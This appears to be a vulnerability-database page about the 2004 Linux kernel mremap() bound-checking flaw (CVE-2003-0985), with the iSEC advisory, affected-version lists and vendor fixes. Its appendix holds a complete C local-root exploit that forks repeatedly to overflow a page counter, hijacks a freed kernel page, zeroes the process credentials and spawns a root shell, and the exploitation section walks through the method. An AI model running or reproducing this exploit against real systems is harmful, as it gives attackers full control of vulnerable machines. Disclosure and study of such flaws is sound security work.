    40014000-40015000 rw-p 00013000 03:05 1544523    /lib/ld-2.3.2.so
    40015000-40016000 rw-p 00000000 00:00 0
    4002c000-40158000 r-xp 00000000 03:05 1544529    /lib/libc.so.6
    40158000-4015d000 rw-p 0012b000 03:05 1544529    /lib/libc.so.6
    4015d000-4015f000 rw-p 00000000 00:00 0
[*] 60000000-60000000 rwxp 00000000 00:00 0
    bfffe000-c0000000 rwxp fffff000 00:00 0

The broken VMA in the above example has been marked with a [*].


Exploitation:
=============

The iSEC team has identified multiple attack vectors for the bug discovered. 
In this section we want to describe the page counter method however we strongly
believe that a much faster and more convenient method exists.

As mentioned above a VMA of 0 bytes in size can be introduced into the process's
virtual memory list. Its unusual size renders such a VMA partially invisible to 
the kernel main VM helper routine called find_vma(). The find_vma(ADDR) function
returns the first VMA descriptor (START, END) from the current process's list
satysfying ADDR < END or NULL if none. Obviously given a VMA starting and ending
at the same address ADDR the condition is violated if one searches for ADDR's VMA
thus the next VMA in the list will be returned.

The mremap() code calls the insert_vm_struct() helper function after creating
the bogus VMA descriptor in kernel memory which in turn checks the new location
calling the find_vma() helper which returns the wrong result if a zero sized VMA
is already present in the new location. Therefore it is possible to introduce 
multiple bogus VMA descriptors for the same virtual memory address. This happens only
if the adjacent zero sized VMAs differ in their descriptor flags because otherwise
they will be linked together in insert_vm_struct(). 

Later the process virtual memory list could look like:

    08048000-080a2000 r-xp 00000000 03:02 53159      /tmp/test
    080a2000-080a5000 rw-p 00059000 03:02 53159      /tmp/test
    080a5000-080a6000 rwxp 00000000 00:00 0
    40000000-40001000 r--p 00000000 00:00 0
    60000000-60000000 r--p 00000000 00:00 0
    60000000-60000000 rw-p 00000000 00:00 0
    60000000-60000000 r--p 00000000 00:00 0
    60000000-60001000 rwxp 00000000 00:00 0
    bffff000-c0000000 rwxp 00000000 00:00 0


Further we have found that there is an off-by-one increment inside the
copy_page_range() function for the page counter of the first VMA page directly
following a zero sized VMA area. This is not a bug in the copy_page_range code(),
it is just a feature for a combined zero and non-zero VMA. The copy_page_range
function is called on fork() to copy parent's page tables into the child process.

Moreover we must note that it is possible to remove a zero-sized VMA from the 
virtual memory list if another suitable VMA is mapped directly below the starting
address of the 0-VMA. Suitable means that the new VMA must have exactly the same
attributes (read, exec, etc) as the following zero-sized VMA and do not map a 
file. This again is a feature of the mmap() system call which will try to 
minimize the number of used VMA descriptors merging them if possible. Note that
merging the VMAs doesn't influence any page counters in following VMAs.

Combining the findings above we conclude that it is possible to arbitrarily 
increment the page counter of the first VMA page by forking more and more a 
process with a zero-sized VMA 'sandwich'. Cleanup must be done in the child 
before it can exit() otherwise the kernel would print a nasty error message
while trying to remove the bogus VMA mappings.

The goal is to overflow the page counter to become 1 again in the child process.
If the corresponding VMA is unmapped now, the page counter will become 0 and the
page returned to the kernel memory management. Note that the parent will still 
hold a reference to the freed page in its page table thus making a manipulation 
of kernel memory possible.

Let's take a closer look at the incrementing of the page counter. 
We can introduce M (marked with A's and B's) 0-sized VMAs directly before the
victim VMA hosting the page we want the counter to overflow. If the victim maps
anonymous memory, the first write access to the victim VMA page (marked with P)
will allocate and insert a fresh page frame into the process's page table and
the page counter will be set to 1:

[A][B][A][B] ... [A][P  VICTIM  ]

After the first fork() P's page counter will become 1 + M + 1 where the first
one is for the original copy in the parent, M for the bogus VMAs and one for
the copy in the child. Cleaning up the 0-VMAs in the child will not change the
page counter however it will be decremented by one on child's exit. Thus after
the first fork()-exit() pair it will become 1 + M. We can conclude for N forks
taking integer overflows into account that without the final exit() call in the
child following equation holds:

1 + M*N + 1 = 1

or that

M*N = 2^32-1 = 3 * 5 * 17 * 257 * 65537

Thus we can for example choose to create (3*5*257) 0-sized VMAs and fork the
parent (17*65537) times to overflow P's page counter. This may be a quite 
longish task. Times ranging from about one hour on a fast machine to more than
10 hours have been observed.

Further exploitation proves to be easy because the kernel page management has 
the nice property to use a kind of reversed LRU policy for page allocation.
That means that if a page has been released to the kernel MM subsystem it will 
be returned on a subsequent allocation request. The released page could be for
example allocated to a file mapping we can normally only read from or to kernel 
structures, etc.

It is worth noting that the parent's page reference (PTE) must be unprotected
before we can use it to modify page contents because fork() will mark it as 
read only (for copy-on-write reasons).


Impact:
=======

Since no special privileges are required to use the mremap(2) system
call any process may misuse its unexpected behavior to disrupt the kernel
memory management subsystem. Proper exploitation of this vulnerability may
lead to local privilege escalation including execution of  arbitrary  code
with kernel level access. Proof-of-concept exploit code has been created 
and successfully tested giving UID 0 shell on vulnerable systems.

All users are encouraged to patch all vulnerable systems as soon as 
appropriate vendor patches are released.


Credits:
========

Paul Starzetz <ihaquer@isec.pl> has identified the vulnerability and
performed further research. 


Disclaimer:
===========

This  document and all the information it contains are provided "as is",
for educational purposes only, without warranty of any kind, whether 
express or implied.

The  authors reserve the right not to be responsible for the topicality,
correctness, completeness or quality of the information provided in
this document. Liability claims regarding damage caused by the use of
any information provided, including any kind of information which is
incomplete or incorrect, will therefore be rejected.


Appendix:
=========

/*
 * Linux kernel mremap() bound checking bug exploit.
 *
 * Bug found by Paul Starzetz <paul@isec.pl>
 *
 * Copyright (c) 2004  iSEC Security Research. All Rights Reserved.
 *
 * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
 * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
 * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
 */

#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <syscall.h>
#include <signal.h>
#include <time.h>
#include <sched.h>

#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/wait.h>

#include <asm/page.h>

#define MREMAP_MAYMOVE	1
#define MREMAP_FIXED	2

#define str(s) 	#s
#define xstr(s) str(s)

#define DSIGNAL		SIGCHLD
#define CLONEFL		(DSIGNAL|CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_VFORK)
#define PAGEADDR	0x2000

#define RNDINT		512

#define NUMVMA		(3 * 5 * 257)
#define NUMFORK		(17 * 65537)

#define DUPTO		1000
#define TMPLEN		256

#define __NR_sys_mremap	163

_syscall5(ulong, sys_mremap, ulong, a, ulong, b, ulong, c, ulong, d, ulong, e);
unsigned long sys_mremap(unsigned long addr, unsigned long old_len, unsigned long new_len,
			 unsigned long flags, unsigned long new_addr);


static volatile int pid = 0, ppid, hpid, *victim, *fops, blah = 0, dummy = 0, uid, gid;
static volatile int *vma_ro, *vma_rw, *tmp;
static volatile unsigned fake_file[16];


void fatal(const char * msg)
{
	printf("\n");
	if (!errno) {
		fprintf(stderr, "FATAL: %s\n", msg);
	} else {
		perror(msg);
	}

	printf("\nentering endless loop");
	fflush(stdout);
	fflush(stderr);
	while (1) pause();
}

void kernel_code(void * file, loff_t offset, int origin)
{
	int i, c;
	int *v;

	if (!file)
		goto out;

	__asm__("movl	%%esp, %0" : : "m" (c));

	c &= 0xffffe000;
	v = (void *) c;

	for (i = 0; i < PAGE_SIZE / sizeof(*v) - 1; i++) {
		if (v[i] == uid && v[i+1] == uid) {
			i++; v[i++] = 0; v[i++] = 0; v[i++] = 0;
		}
		if (v[i] == gid) {
			v[i++] = 0; v[i++] = 0; v[i++] = 0; v[i++] = 0;
			break;
		}
	}
out:
	dummy++;
}

void try_to_exploit(void)
{
	int v = 0;

	v += fops[0];
	v += fake_file[0];

	kernel_code(0, 0, v);
	lseek(DUPTO, 0, SEEK_SET);

	if (geteuid()) {
		printf("\nFAILED uid!=0"); fflush(stdout);
		errno =- ENOSYS;
		fatal("uid change");
	}

	printf("\n[+] PID %d GOT UID 0, enjoy!", getpid()); fflush(stdout);

	kill(ppid, SIGUSR1);
	setresuid(0, 0, 0);
	sleep(1);

	printf("\n\n"); fflush(stdout);

	execl("/bin/bash", "bash", NULL);
	fatal("burp");
}

void cleanup(int v)
{
	victim[DUPTO] = victim[0];
	kill(0, SIGUSR2);
}


void redirect_filp(int v)
{
	printf("\n[!] parent check race... "); fflush(stdout);

	if (victim[DUPTO] && victim[0] == victim[DUPTO]) {
		printf("SUCCESS, cought SLAB page!"); fflush(stdout);
		victim[DUPTO] = (unsigned) & fake_file;
		signal(SIGUSR1, &cleanup);
		kill(pid, SIGUSR1);
	} else {
		printf("FAILED!");
	}
	fflush(stdout);
}

int get_slab_objs(void)
{
	FILE * fp;
	int c, d, u = 0, a = 0;
	static char line[TMPLEN], name[TMPLEN];

	fp = fopen("/proc/slabinfo", "r");
	if (!fp)
		fatal("fopen");

	fgets(name, sizeof(name) - 1, fp);
	do {
		c = u = a =- 1;
		if (!fgets(line, sizeof(line) - 1, fp))
			break;
		c = sscanf(line, "%s %u %u %u %u %u %u", name, &u, &a, &d, &d, &d, &d);
	} while (strcmp(name, "size-4096"));
	
	fclose(fp);

	return c == 7 ? a - u : -1;
}

void unprotect(int v)
{
	int n, c = 1;

	*victim = 0;
	printf("\n[+] parent unprotected PTE "); fflush(stdout);

	dup2(0, 2);
	while (1) {
		n = get_slab_objs();
		if (n < 0)
			fatal("read slabinfo");
		if (n > 0) {
			printf("\n    depopulate SLAB #%d", c++);
			blah = 0; kill(hpid, SIGUSR1);
			while (!blah) pause();
		}
		if (!n) {
			blah = 0; kill(hpid, SIGUSR1);
			while (!blah) pause();
			dup2(0, DUPTO);
			break;
		}
	}

	signal(SIGUSR1, &redirect_filp);
	kill(pid, SIGUSR1);
}

void cleanup_vmas(void)
{
	int i = NUMVMA;

	while (1) {
		tmp = mmap((void *) (PAGEADDR - PAGE_SIZE), PAGE_SIZE, PROT_READ,
				MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, 0, 0);
		if (tmp != (void *) (PAGEADDR - PAGE_SIZE)) {
			printf("\n[-] ERROR unmapping %d", i); fflush(stdout);
			fatal("unmap1");
		}
		i--;
		if (!i)
			break;

		tmp = mmap((void *) (PAGEADDR - PAGE_SIZE), PAGE_SIZE, PROT_READ|PROT_WRITE,
				MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
		if (tmp != (void *) (PAGEADDR - PAGE_SIZE)) {
			printf("\n[-] ERROR unmapping %d", i); fflush(stdout);
			fatal("unmap2");
		}
		i--;
		if (!i)
			break;
	}
}

void catchme(int v)
{
	blah++;
}

void exitme(int v)
{
	_exit(0);
}

void childrip(int v)
{
	waitpid(-1, 0, WNOHANG);
}

void slab_helper(void)
{
	signal(SIGUSR1, &catchme);
	signal(SIGUSR2, &exitme);
	blah = 0;

	while (1) {
		while (!blah) pause();

		blah = 0;
		if (!fork()) {
			dup2(0, DUPTO);
			kill(getppid(), SIGUSR1);
			while (1) pause();
		} else {
			while (!blah) pause();
			blah = 0; kill(ppid, SIGUSR2);
		}
	}
	exit(0);
}

int main(void)
{
	int i, r, v, cnt;
	time_t start;

	srand(time(NULL) + getpid());
	ppid = getpid();
	uid = getuid();
	gid = getgid();

	hpid = fork();
	if (!hpid)
		slab_helper();

	fops = mmap(0, PAGE_SIZE, PROT_EXEC|PROT_READ|PROT_WRITE,
			MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
	if (fops == MAP_FAILED)
		fatal("mmap fops VMA");
	for (i = 0; i < PAGE_SIZE / sizeof(*fops); i++)
		fops[i] = (unsigned)&kernel_code;
	for (i = 0; i < sizeof(fake_file) / sizeof(*fake_file); i++)
		fake_file[i] = (unsigned)fops;

	vma_ro = mmap(0, PAGE_SIZE, PROT_READ, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
	if (vma_ro == MAP_FAILED)
		fatal("mmap1");

	vma_rw = mmap(0, PAGE_SIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
	if (vma_rw == MAP_FAILED)
		fatal("mmap2");

	cnt = NUMVMA;
	while (1) {
		r = sys_mremap((ulong)vma_ro, 0, 0, MREMAP_FIXED|MREMAP_MAYMOVE, PAGEADDR);
		if (r == (-1)) {
			printf("\n[-] ERROR remapping"); fflush(stdout);
			fatal("remap1");
		}
		cnt--;
		if (!cnt) break;

		r = sys_mremap((ulong)vma_rw, 0, 0, MREMAP_FIXED|MREMAP_MAYMOVE, PAGEADDR);
		if (r == (-1)) {
			printf("\n[-] ERROR remapping"); fflush(stdout);
			fatal("remap2");
		}
		cnt--;
		if (!cnt) break;
	}

	victim = mmap((void*)PAGEADDR, PAGE_SIZE, PROT_EXEC|PROT_READ|PROT_WRITE,
			MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
	if (victim != (void *) PAGEADDR)
		fatal("mmap victim VMA");

	v = *victim;
	*victim = v + 1;

	signal(SIGUSR1, &unprotect);
	signal(SIGUSR2, &catchme);
	signal(SIGCHLD, &childrip);
	printf("\n[+] Please wait...HEAVY SYSTEM LOAD!\n"); fflush(stdout);
	start = time(NULL);

	cnt = NUMFORK;
	v = 0;
	while (1) {
		cnt--;
		v--;
		dummy += *victim;

		if (cnt > 1) {
			__asm__(
			"pusha				\n"
			"movl %1, %%eax			\n"
			"movl $("xstr(CLONEFL)"), %%ebx	\n"
			"movl %%esp, %%ecx		\n"
			"movl $120, %%eax		\n"
			"int  $0x80			\n"
			"movl %%eax, %0			\n"
			"popa				\n"
			: : "m" (pid), "m" (dummy)
			);
		} else {
			pid = fork();
		}

		if (pid) {
			if (v <= 0 && cnt > 0) {
				float eta, tm;
				v = rand() % RNDINT / 2 + RNDINT / 2;
				tm = eta = (float)(time(NULL) - start);
				eta *= (float)NUMFORK;
				eta /= (float)(NUMFORK - cnt);
				printf("\r\t%u of %u [ %u %%  ETA %6.1f s ]          ",
				NUMFORK - cnt, NUMFORK, (100 * (NUMFORK - cnt)) / NUMFORK, eta - tm);
				fflush(stdout);
			}
			if (cnt) {
				waitpid(pid, 0, 0);
				continue;
			}
			if (!cnt) {
				while (1) {
					 r = wait(NULL);
					 if (r == pid) {
					 	cleanup_vmas();
						while (1) { kill(0, SIGUSR2); kill(0, SIGSTOP); pause(); }
					 }
				}
			}
		}

		else {
			cleanup_vmas();

			if (cnt > 0) {
				_exit(0);
			}

			printf("\n[+] overflow done, the moment of truth..."); fflush(stdout);
			sleep(1);

			signal(SIGUSR1, &catchme);
			munmap(0, PAGE_SIZE);
			dup2(0, 2);
			blah = 0; kill(ppid, SIGUSR1);
			while (!blah) pause();

			munmap((void *)victim, PAGE_SIZE);
			dup2(0, DUPTO);

			blah = 0; kill(ppid, SIGUSR1);
			while (!blah) pause();
			try_to_exploit();
			while (1) pause();
		}
	}
	return 0;
}


-- 
Paul Starzetz
iSEC Security Research
http://isec.pl/
    

- 漏洞信息 (F32438)

isec-0013-mremap.txt (PacketStormID:F32438)
2004-01-05 00:00:00
Wojciech Purczynski,Paul Starzetz  isec.pl
advisory,arbitrary,kernel,local
linux
CVE-2003-0985
[点击下载]

The mremap system call in the Linux kernel memory management code has a critical security vulnerability due to incorrect bounds checking. Proper exploitation of this vulnerability may lead to local privilege escalation including execution of arbitrary code with kernel level access.

Synopsis:  Linux kernel do_mremap local privilege escalation vulnerability
Product:   Linux kernel
Version:   2.2, 2.4 and 2.6 series

Vendor:    http://www.kernel.org/
URL:       http://isec.pl/vulnerabilities/isec-0013-mremap.txt
CVE:       http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0985
Author:    Paul Starzetz <ihaquer@isec.pl>,
           Wojciech Purczynski <cliph@isec.pl>
Date:      January 5, 2004


Issue:
======

A critical security vulnerability has been found  in  the  Linux  kernel
memory  management  code in mremap(2) system call due to incorrect bound
checks.


Details:
========

The mremap system call provides functionality of resizing (shrinking  or
growing)  as well as moving across process's addressable space of existing
virtual memory areas (VMAs) or any of its parts.

A typical VMA covers at least one memory page (which is exactly  4kB  on
the i386  architecture). An incorrect bound check discovered inside the
do_mremap() kernel code performing remapping of a virtual memory  area
may lead to creation of a virtual memory area of 0 bytes length.

The problem bases on the general mremap flaw that remapping of 2 pages
from inside a VMA creates a memory hole of only one page in length but
an additional  VMA  of two pages. In the case of a zero sized remapping
request no VMA hole is created but an additional VMA descriptor of 0
bytes in length is created.

Such a malicious virtual memory area may disrupt the operation of other
parts of the kernel memory management subroutines finally leading to 
unexpected behavior.

A typical process's memory layout showing invalid VMA created with
mremap system call:

    08048000-0804c000 r-xp 00000000 03:05 959142     /tmp/test
    0804c000-0804d000 rw-p 00003000 03:05 959142     /tmp/test
    0804d000-0804e000 rwxp 00000000 00:00 0
    40000000-40014000 r-xp 00000000 03:05 1544523    /lib/ld-2.3.2.so
    40014000-40015000 rw-p 00013000 03:05 1544523    /lib/ld-2.3.2.so
    40015000-40016000 rw-p 00000000 00:00 0
    4002c000-40158000 r-xp 00000000 03:05 1544529    /lib/libc.so.6
    40158000-4015d000 rw-p 0012b000 03:05 1544529    /lib/libc.so.6
    4015d000-4015f000 rw-p 00000000 00:00 0
[*] 60000000-60000000 rwxp 00000000 00:00 0
    bfffe000-c0000000 rwxp fffff000 00:00 0

The broken VMA in the above example has been marked with a [*].


Impact:
=======

Since no special privileges are required to use the mremap(2) system
call any process may misuse its unexpected behavior to disrupt the kernel
memory management subsystem. Proper exploitation of this vulnerability may
lead to local privilege escalation including execution of  arbitrary  code
with kernel level access. Proof-of-concept exploit code has been created 
and successfully tested giving UID 0 shell on vulnerable systems.

The exploitability of the discovered vulnerability is possible, although
not a trivial one. We have identified at least two different attack 
vectors for the  2.4 kernel series. All users are encouraged to patch all
vulnerable systems as soon as appropriate vendor patches are released.


Credits:
========

Paul Starzetz <ihaquer@isec.pl> has identified the vulnerability and
performed further research. 


Disclaimer:
===========

This  document and all the information it contains are provided "as is",
for educational purposes only, without warranty of any kind, whether 
express or implied.

The  authors reserve the right not to be responsible for the topicality,
correctness, completeness or quality of the information provided in
this document. Liability claims regarding damage caused by the use of
any information provided, including any kind of information which is
incomplete or incorrect, will therefore be rejected.
    

- 漏洞信息

3315
Linux Kernel do_mremap() Privilege Escalation
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

A local overflow exists in the Linux kernel. The do_mremap() function fails to perform bounds checking resulting in a buffer overflow. With a specially crafted request, an attacker can execute arbitrary code resulting in a loss of confidentiality, integrity, and/or availability.

- 时间线

2004-01-05 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 2.4.24 or higher, or 2.6.1 or higher, as they have been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

Linux Kernel do_mremap Function Boundary Condition Vulnerability
Boundary Condition Error 9356
No Yes
2004-01-05 12:00:00 2009-07-12 12:56:00
Discovery is credited to Paul Starzetz and Wojciech Purczynski.

- 受影响的程序版本

VMWare ESX Server 2.0.1 build 6403
VMWare ESX Server 2.0.1
VMWare ESX Server 2.0
VMWare ESX Server 1.5.2
Sun Cobalt RaQ 550
SmoothWall Express 2.0 beta6
SmoothWall Express 2.0 beta
SmoothWall Express 2.0
SGI ProPack 2.4
Linux kernel 2.6.1 -rc1
Linux kernel 2.6 -test9
Linux kernel 2.6 -test8
Linux kernel 2.6 -test7
Linux kernel 2.6 -test6
Linux kernel 2.6 -test5
Linux kernel 2.6 -test4
Linux kernel 2.6 -test3
Linux kernel 2.6 -test2
Linux kernel 2.6 -test11
Linux kernel 2.6 -test10
Linux kernel 2.6 -test1
Linux kernel 2.6
Linux kernel 2.4.23
+ Trustix Secure Linux 2.0
Linux kernel 2.4.22
+ Devil-Linux Devil-Linux 1.0.5
+ Devil-Linux Devil-Linux 1.0.4
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2
+ Red Hat Fedora Core1
+ Slackware Linux 9.1
Linux kernel 2.4.21 pre7
Linux kernel 2.4.21 pre4
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
Linux kernel 2.4.21 pre1
Linux kernel 2.4.21
+ Conectiva Linux 9.0
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
+ Red Hat Enterprise Linux AS 3
+ RedHat Desktop 3.0
+ RedHat Enterprise Linux ES 3
+ RedHat Enterprise Linux WS 3
+ S.u.S.E. Linux Personal 9.0 x86_64
+ S.u.S.E. Linux Personal 9.0
+ SuSE SUSE Linux Enterprise Server 8
Linux kernel 2.4.20
Linux kernel 2.4.19 -pre6
Linux kernel 2.4.19 -pre5
Linux kernel 2.4.19 -pre4
Linux kernel 2.4.19 -pre3
Linux kernel 2.4.19 -pre2
Linux kernel 2.4.19 -pre1
Linux kernel 2.4.19
+ Conectiva Linux 8.0
+ Conectiva Linux Enterprise Edition 1.0
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ MandrakeSoft Multi Network Firewall 2.0
+ Mandriva Linux Mandrake 9.0
+ S.u.S.E. Linux 8.1
+ Slackware Linux -current
+ SuSE SUSE Linux Enterprise Server 8
+ SuSE SUSE Linux Enterprise Server 7
Linux kernel 2.4.18 pre-8
Linux kernel 2.4.18 pre-7
Linux kernel 2.4.18 pre-6
Linux kernel 2.4.18 pre-5
Linux kernel 2.4.18 pre-4
Linux kernel 2.4.18 pre-3
Linux kernel 2.4.18 pre-2
Linux kernel 2.4.18 pre-1
Linux kernel 2.4.18 x86
+ Debian Linux 3.0 ia-32
Linux kernel 2.4.18
+ Astaro Security Linux 2.0 23
+ Astaro Security Linux 2.0 16
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0
+ Red Hat Enterprise Linux AS 2.1 IA64
+ RedHat Advanced Workstation for the Itanium Processor 2.1 IA64
+ RedHat Advanced Workstation for the Itanium Processor 2.1
+ RedHat Linux 8.0
+ RedHat Linux 7.3
+ S.u.S.E. Linux 8.1
+ S.u.S.E. Linux 8.0
+ S.u.S.E. Linux 7.3
+ S.u.S.E. Linux 7.2
+ S.u.S.E. Linux 7.1
+ S.u.S.E. Linux Connectivity Server
+ S.u.S.E. Linux Database Server 0
+ S.u.S.E. Linux Firewall on CD
+ S.u.S.E. Linux Office Server
+ S.u.S.E. Linux Openexchange Server
+ S.u.S.E. Linux Personal 8.2
+ S.u.S.E. SuSE eMail Server 3.1
+ S.u.S.E. SuSE eMail Server III
+ SuSE SUSE Linux Enterprise Server 8
+ SuSE SUSE Linux Enterprise Server 7
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Workstation 8.0
+ Turbolinux Turbolinux Workstation 7.0
Linux kernel 2.4.17
Linux kernel 2.4.16
+ Sun Cobalt RaQ 550
Linux kernel 2.4.15
Linux kernel 2.4.14
Linux kernel 2.4.13
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Workstation 3.1.1
Linux kernel 2.4.12
+ Conectiva Linux 7.0
Linux kernel 2.4.11
Linux kernel 2.4.10
Linux kernel 2.4.9
+ Red Hat Enterprise Linux AS 2.1 IA64
+ Red Hat Enterprise Linux AS 2.1
+ RedHat Enterprise Linux ES 2.1 IA64
+ RedHat Enterprise Linux ES 2.1
+ RedHat Enterprise Linux WS 2.1 IA64
+ RedHat Enterprise Linux WS 2.1
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2 alpha
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ Sun Linux 5.0.5
+ Sun Linux 5.0.3
+ Sun Linux 5.0
Linux kernel 2.4.8
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0
Linux kernel 2.4.7
+ RedHat Linux 7.2
+ S.u.S.E. Linux 7.2
+ S.u.S.E. Linux 7.1
Linux kernel 2.4.6
Linux kernel 2.4.5
+ Slackware Linux 8.0
Linux kernel 2.4.4
+ S.u.S.E. Linux 7.2
Linux kernel 2.4.3
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
Linux kernel 2.4.2
Linux kernel 2.4.1
Linux kernel 2.4 .0-test9
Linux kernel 2.4 .0-test8
Linux kernel 2.4 .0-test7
Linux kernel 2.4 .0-test6
Linux kernel 2.4 .0-test5
Linux kernel 2.4 .0-test4
Linux kernel 2.4 .0-test3
Linux kernel 2.4 .0-test2
Linux kernel 2.4 .0-test12
Linux kernel 2.4 .0-test11
Linux kernel 2.4 .0-test10
Linux kernel 2.4 .0-test1
Linux kernel 2.4
Linux kernel 2.2.25
Linux kernel 2.2.24
Linux kernel 2.2.23
Linux kernel 2.2.22
Linux kernel 2.2.21
Linux kernel 2.2.20
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2
Linux kernel 2.2.19
+ EnGarde Secure Linux 1.0.1
+ Immunix Immunix OS 7+
+ MandrakeSoft Single Network Firewall 7.2
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
+ S.u.S.E. Linux 7.0
+ S.u.S.E. Linux 6.4
+ S.u.S.E. Linux 6.3
+ Trustix Secure Linux 1.5
Linux kernel 2.2.18
+ Caldera OpenLinux 2.4
+ Conectiva Linux 6.0
+ Conectiva Linux 5.1
+ Conectiva Linux 5.0
+ Conectiva Linux 4.2
+ Conectiva Linux 4.1
+ Conectiva Linux 4.0 es
+ Conectiva Linux 4.0
+ Conectiva Linux graficas
+ Conectiva Linux ecommerce
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 68k
+ Debian Linux 2.2
+ Mandriva Linux Mandrake 7.2
+ Mandriva Linux Mandrake 7.1
+ Mandriva Linux Mandrake 7.0
+ Mandriva Linux Mandrake 6.1
+ Mandriva Linux Mandrake 6.0
+ RedHat Linux 7.0 sparc
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
+ RedHat Linux 6.1 sparc
+ RedHat Linux 6.1 i386
+ RedHat Linux 6.1 alpha
+ RedHat Linux 6.0 sparc
+ RedHat Linux 6.0 alpha
+ RedHat Linux 6.0
+ S.u.S.E. Linux 7.0
+ S.u.S.E. Linux 6.4 ppc
+ S.u.S.E. Linux 6.4 alpha
+ S.u.S.E. Linux 6.4
+ S.u.S.E. Linux 6.3 ppc
+ S.u.S.E. Linux 6.3 alpha
+ S.u.S.E. Linux 6.3
+ S.u.S.E. Linux 6.1 alpha
+ S.u.S.E. Linux 6.1
+ S.u.S.E. Linux 6.0
+ SCO eDesktop 2.4
+ SCO eServer 2.3.1
+ Slackware Linux 7.1
+ Slackware Linux 7.0
+ Slackware Linux 4.0
+ Wirex Immunix OS 7.0 -Beta
+ Wirex Immunix OS 7.0
+ Wirex Immunix OS 6.2
Linux kernel 2.2.17
+ Mandriva Linux Mandrake 7.2
+ S.u.S.E. Linux 7.0
+ Trustix Secure Linux 1.2
Linux kernel 2.2.16 pre6
Linux kernel 2.2.16
Linux kernel 2.2.15 pre20
Linux kernel 2.2.15 pre16
Linux kernel 2.2.15
+ MandrakeSoft Corporate Server 1.0.1
+ Mandriva Linux Mandrake 7.1
Linux kernel 2.2.14
+ Red Hat Linux 6.2
+ SCO eDesktop 2.4
+ SCO eServer 2.3.1
+ Sun Cobalt RaQ 4
Linux kernel 2.2.13
+ S.u.S.E. Linux 6.4
+ S.u.S.E. Linux 6.3
Linux kernel 2.2.12
Linux kernel 2.2.11
Linux kernel 2.2.10
+ Caldera OpenLinux 2.3
Linux kernel 2.2.9
Linux kernel 2.2.8
Linux kernel 2.2.7
Linux kernel 2.2.6
Linux kernel 2.2.5
Linux kernel 2.2.4
Linux kernel 2.2.3
Linux kernel 2.2.2
Linux kernel 2.2.1
Linux kernel 2.2
Avaya Communication Manager Server S8700
Avaya Communication Manager Server S8500
Avaya Communication Manager Server S8300
Linux kernel 2.6.1 -rc2
Linux kernel 2.4.24

- 不受影响的程序版本

Linux kernel 2.6.1 -rc2
Linux kernel 2.4.24

- 漏洞讨论

A vulnerability involving the do_mremap system function has been reported in the Linux kernel, allowing for local privilege escalation. Due to a bounds checking issue within the function, it is possible for local attackers to disrupt the operation of the kernel. Attack vectors also exist that may permit a local attacker to gain root privileges.

This type of vulnerability will permit a remote attacker who has gain limited privileges on a host to fully compromise the system.

- 漏洞利用

A reliable proof-of-concept exploit has been developed by Paul Starzetz &lt;ihaquer@isec.pl&gt; and Wojciech Purczynski &lt;cliph@isec.pl&gt;. This exploit is presented in the following document:
http://isec.pl/vulnerabilities/isec-0013-mremap.txt

A proof-of-concept (mremap_poc.c) was also released to test whether the vulnerability is present in the kernel.

- 解决方案

Avaya has released an advisory to address this issue. Avaya recommends that customers contact their service representative, to upgrade to field load 220. Further information can be found in the advisory located at the following URI:
http://support.avaya.com/japple/css/japple?temp.groupID=&temp.selectedFamily=128451&temp.selectedProduct=154235&temp.selectedBucket=126655&temp.feedbackState=askForFeedback&temp.documentID=158687&PAGE=avaya.css.CSSLvl1Detail&executeTransaction=avaya.css.UsageUpdate()

Sun has released a fix to address this issue in the Sun Cobalt RaQ 550. The fix is linked below.

